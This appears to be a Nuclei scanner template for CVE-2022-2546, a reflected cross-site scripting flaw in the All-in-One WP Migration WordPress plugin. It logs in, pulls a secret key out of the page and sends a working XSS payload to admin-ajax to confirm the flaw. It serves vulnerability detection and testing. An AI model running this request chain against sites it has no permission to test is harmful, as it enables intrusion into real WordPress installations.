53 lines
1.8 KiB
YAML
53 lines
1.8 KiB
YAML
|
id: CVE-2022-2546
|
||
|
|
||
|
info:
|
||
|
name: All-in-One WP Migration plugin - Cross-Site Scripting (XSS)
|
||
|
author: theamanrawat
|
||
|
severity: medium
|
||
|
description: |
|
||
|
Reflected Cross-Site Scripting (XSS) vulnerability in WordPress All-in-One WP Migration plugin (versions <= 7.62).
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/f84920e4-a1fe-47cf-9ba5-731989c70f58
|
||
|
- https://wordpress.org/plugins/all-in-one-wp-migration/
|
||
|
- https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-2546
|
||
|
classification:
|
||
|
cve-id: CVE-2022-2546
|
||
|
metadata:
|
||
|
verified: true
|
||
|
tags: cve,cve2022,wordpress,wp-plugin,wp,xss,all-in-one-wp-migration,authenticated
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /wp-login.php HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||
|
|
||
|
- |
|
||
|
GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
- |
|
||
|
GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
cookie-reuse: true
|
||
|
req-condition: true
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- contains(all_headers_3, "text/html")
|
||
|
- status_code_3 == 200
|
||
|
- contains(body_3, '{\"new_value\":[\"XSSPAYLOAD<svg onload=alert(document.domain)>')
|
||
|
condition: and
|
||
|
|
||
|
extractors:
|
||
|
- type: regex
|
||
|
name: secretkey
|
||
|
group: 1
|
||
|
regex:
|
||
|
- 'ai1wm_feedback"},"secret_key":"([0-9a-zA-Z]+)"'
|
||
|
internal: true
|